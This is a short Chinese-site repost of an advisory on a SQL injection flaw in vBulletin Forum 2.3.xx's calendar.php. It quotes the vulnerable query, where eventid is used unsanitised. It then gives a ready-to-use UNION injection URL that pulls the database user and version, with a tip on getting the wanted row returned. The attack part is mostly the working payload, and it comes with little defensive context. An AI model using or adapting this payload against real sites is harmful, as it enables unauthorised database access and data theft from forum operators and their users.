您现在的位置是:门户> 编程语言> PHP

vBulletin Forum 2.3.xx SQL Injection
2020-03-11 48人围观 0条评论
简介vBulletin Forum 2.3.xx SQL Injection

    vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

    -------- Cut from line 585 in calendar.php ----------
    else if ($action == "edit")
    {
          $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
    eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
    -----------------------------------------------------

    If the MySQL version is greater than 4.00, a UNION attack could be used.

    -----------------------------------------
    http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
    ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
    -----------------------------------------

    The query_first function will only return the first row of the query result, so make sure it returns !
    the one you want.
分享:

文章评论